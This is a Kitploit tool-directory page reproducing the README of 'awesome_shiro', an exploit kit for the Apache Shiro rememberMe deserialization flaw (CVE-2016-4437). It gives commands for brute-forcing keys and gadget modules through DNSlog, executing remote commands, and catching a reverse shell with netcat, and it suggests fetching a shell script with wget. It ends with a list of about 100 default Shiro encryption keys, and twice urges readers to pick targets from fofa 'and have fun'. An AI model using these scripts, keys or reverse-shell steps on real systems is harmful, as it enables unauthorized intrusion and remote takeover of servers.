Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Awesome_shiro — CVE-2016-4437-Shiro反序列化爆破模块和key,命令执行,反弹shell的脚本 | Kitploit
Tools/GitHubGitHub/bkfish/awesome_shiro
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubbkfish/awesome_shiro

Awesome_shiro

CVE-2016-4437-Shiro反序列化爆破模块和key,命令执行,反弹shell的脚本

View Repository
55166 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Awesome-shiro

CVE-2016-4437 Shiro<=1.2.4 deserialization, brute-force module and key, code execution, reverse shell tool


Vulnerability Cause

Because Shiro deserializes the rememberMe field in the cookie, if you know Shiro's encoding method, you can encode a malicious command using its encoding method and place it in the HTTP header's cookie. When Shiro deserializes the submitted cookie's rememberMe field, the injected command is executed, resulting in command execution.

Shiro uses CookieRememberMeManager by default, and its cookie processing flow is: Get the rememberMe cookie value --> Base64 decode --> AES decrypt --> Deserialize

Environment

Works on both linux/win10 Works on both python2/python3 Since the module directory contains ysoserial.jar, the project is a bit large. Please bear with us.

Local Target Setup

root@kitploit:~
docker pull medicean/vulapps:s_shiro_1
docker run -d -p 80:8080 medicean/vulapps:s_shiro_1

Script Usage

1. shiro_crack.py Brute-force module usage

Needs to be combined with http://dnslog.cn/

root@kitploit:~
python3 shiro_crack.py http://www.baidu.com/login.do 1695jb.dnslog.cn

After success, check the records – record format is {{key}}.{{module}}.dnslogurl

root@kitploit:~
U3ByaW5nQmxhZGUAAAAAAA.CommonsBeanutils1.x9zm4v.dnslog.cn

This shows the successful key is U3ByaW5nQmxhZGUAAAAAAA==, and the module is CommonsBeanutils1. Because the key may contain ==/+ and other characters, this project does a bit of escaping. You need to manually compare with the keys in Appendix 1. Pick a target from fofa and have fun. 1.png 2.png

Principle of shiro_crack.py

Actually, there are many tools online that brute-force modules and keys, but they usually only tell you if it worked, not which key and module were used, because for blind RCE, the response code is always 200 regardless of success or failure. This project combines brute-force modules and keys with DNSlog to indirectly obtain the successful key and module. The principle is the essence of DNSlog: when a DNS is resolved, it leaves a log. By reading the resolution logs of multi-level domain names, we can obtain the request information.

2. shiro_rce.py RCE usage

Can be combined with http://dnslog.cn/

root@kitploit:~
python3 shiro_rce.py http://www.baidu.com/login.do "ping rcetest.x9zm4v.dnslog.cn"

Check DNSlog for ping rcetest.x9zm4v.dnslog.cn. For differentiation, it is recommended to use a subdomain one level lower.

shiro_rce Configuration

  1. Configure the module Modify line 13: python popen = subprocess.Popen(['java', '-jar', '../module/ysoserial.jar', 'CommonsBeanutils1', command], stdout=subprocess.PIPE) Change CommonsBeanutils1 to the module obtained from brute-force.
  2. Configure the key Modify line 16:
    root@kitploit:~
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
    
    Change it to the key obtained from brute-force. Pick a target from fofa and have fun. 3.png 4.png

3. shiro_getshell Reverse shell

root@kitploit:~
nc -lvnp 7777
python3 shiro_exp.py -u {{target machine}} -lh {{IP for reverse shell}} -lp {{port for reverse shell}}

For safety, test on localhost. The principle is to bundle JRMPListener and payload together. Actually, you could skip JRMPListener in theory.

shiro_getshell test:

6.png 5.png


A small thought: Since outbound traffic is possible, why not directly use shiro_rce with bash reverse shell? I tried a few times and failed. I think Shiro has some filtering, but I noticed you can first use wget to download a reverse shell .sh script, then execute it with sh. Reference: My little research on reverse shell without jrmplistener


4. fuzz-shiro

A simple test based on request/response headers – put Shiro-enabled sites into shiro.txt.

5. shiro_piliang_crack.py

It is recommended to first obtain Shiro-enabled sites from fuzz-shiro into shiro.txt, then brute-force in bulk. DNSlog records will be:

{{key}}.{{module}}.{{url}}.dnsurl

Works well in tests.

Common Issues

1. "No module named 'Crypto'" on Win10

Run the following commands:

root@kitploit:~
pip uninstall crypto pycryptodome
pip install pycryptodome

Then go to Python installation directory \Lib\site-packages, and rename the crypto folder to Crypto.

Appendix 1: Common Shiro Keys

root@kitploit:~
kPH+bIxk5D2deZiIxcaaaA==
4AvVhmFLUs0KTA3Kprsdag==
Z3VucwAAAAAAAAAAAAAAAA==
fCq+/xW488hMTCD+cmJ3aQ==
0AvVhmFLUs0KTA3Kprsdag==
1AvVhdsgUs0FSA3SDFAdag==
1QWLxg+NYmxraMoxAXu/Iw==
25BsmdYwjnfcWmnhAciDDg==
2AvVhdsgUs0FSA3SDFAdag==
3AvVhmFLUs0KTA3Kprsdag==
3JvYhmBLUs0ETA5Kprsdag==
r0e3c16IdVkouZgk1TKVMg==
5aaC5qKm5oqA5pyvAAAAAA==
5AvVhmFLUs0KTA3Kprsdag==
6AvVhmFLUs0KTA3Kprsdag==
6NfXkC7YVCV5DASIrEm1Rg==
6ZmI6I2j5Y+R5aSn5ZOlAA==
cmVtZW1iZXJNZQAAAAAAAA==
7AvVhmFLUs0KTA3Kprsdag==
8AvVhmFLUs0KTA3Kprsdag==
8BvVhmFLUs0KTA3Kprsdag==
9AvVhmFLUs0KTA3Kprsdag==
OUHYQzxQ/W9e/UjiAGu6rg==
a3dvbmcAAAAAAAAAAAAAAA==
aU1pcmFjbGVpTWlyYWNsZQ==
bWljcm9zAAAAAAAAAAAAAA==
bWluZS1hc3NldC1rZXk6QQ==
bXRvbnMAAAAAAAAAAAAAAA==
ZUdsaGJuSmxibVI2ZHc9PQ==
wGiHplamyXlVB11UXWol8g==
U3ByaW5nQmxhZGUAAAAAAA==
MTIzNDU2Nzg5MGFiY2RlZg==
L7RioUULEFhRyxM7a2R/Yg==
a2VlcE9uR29pbmdBbmRGaQ==
WcfHGU25gNnTxTlmJMeSpw==
OY//C4rhfwNxCQAQCrQQ1Q==
5J7bIJIV0LQSN3c9LPitBQ==
f/SY5TIve5WWzT4aQlABJA==
bya2HkYo57u6fWh5theAWw==
WuB+y2gcHRnY2Lg9+Aqmqg==
kPv59vyqzj00x11LXJZTjJ2UHW48jzHN
3qDVdLawoIr1xFd6ietnwg==
ZWvohmPdUsAWT3=KpPqda
YI1+nBV//m7ELrIyDHm6DQ==
6Zm+6I2j5Y+R5aS+5ZOlAA==
2A2V+RFLUs+eTA3Kpr+dag==
6ZmI6I2j3Y+R1aSn5BOlAA==
SkZpbmFsQmxhZGUAAAAAAA==
2cVtiE83c4lIrELJwKGJUw==
fsHspZw/92PrS3XrPW+vxw==
XTx6CKLo/SdSgub+OPHSrw==
sHdIjUN6tzhl8xZMG3ULCQ==
O4pdf+7e+mZe8NyxMTPJmQ==
HWrBltGvEZc14h9VpMvZWw==
rPNqM6uKFCyaL10AK51UkQ==
Y1JxNSPXVwMkyvES/kJGeQ==
lT2UvDUmQwewm6mMoiw4Ig==
MPdCMZ9urzEA50JDlDYYDg==
xVmmoltfpb8tTceuT5R7Bw==
c+3hFGPjbgzGdrC+MHgoRQ==
ClLk69oNcA3m+s0jIMIkpg==
Bf7MfkNR0axGGptozrebag==
1tC/xrDYs8ey+sa3emtiYw==
ZmFsYWRvLnh5ei5zaGlybw==
cGhyYWNrY3RmREUhfiMkZA==
IduElDUpDDXE677ZkhhKnQ==
yeAAo1E8BOeAYfBlm4NG9Q==
cGljYXMAAAAAAAAAAAAAAA==
2itfW92XazYRi5ltW0M2yA==
XgGkgqGqYrix9lI6vxcrRw==
ertVhmFLUs0KTA3Kprsdag==
5AvVhmFLUS0ATA4Kprsdag==
s0KTA3mFLUprK4AvVhsdag==
hBlzKg78ajaZuTE0VLzDDg==
9FvVhtFLUs0KnA3Kprsdyg==
d2ViUmVtZW1iZXJNZUtleQ==
yNeUgSzL/CfiWw1GALg6Ag==
NGk/3cQ6F5/UNPRh8LpMIg==
4BvVhmFLUs0KTA3Kprsdag==
MzVeSkYyWTI2OFVLZjRzZg==
CrownKey==a12d/dakdad
empodDEyMwAAAAAAAAAAAA==
A7UzJgh1+EWj5oBFi+mSgw==
YTM0NZomIzI2OTsmIzM0NTueYQ==
c2hpcm9fYmF0aXMzMgAAAA==
i45FVt72K2kLgvFrJtoZRw==
U3BAbW5nQmxhZGUAAAAAAA==
ZnJlc2h6Y24xMjM0NTY3OA==
Jt3C93kMR9D5e8QzwfsiMw==
MTIzNDU2NzgxMjM0NTY3OA==
vXP33AonIp9bFwGl7aT7rA==
V2hhdCBUaGUgSGVsbAAAAA==
Z3h6eWd4enklMjElMjElMjE=
Q01TX0JGTFlLRVlfMjAxOQ==
ZAvph3dsQs0FSL3SDFAdag==
Is9zJ3pzNh2cgTHB4ua3+Q==
NsZXjXVklWPZwOfkvk6kUA==
GAevYnznvgNCURavBhCr1w==
66v1O8keKNV3TTcGPK1wzg==
SDKOLKn2J1j/2BHjeZwAoQ==
Download Tool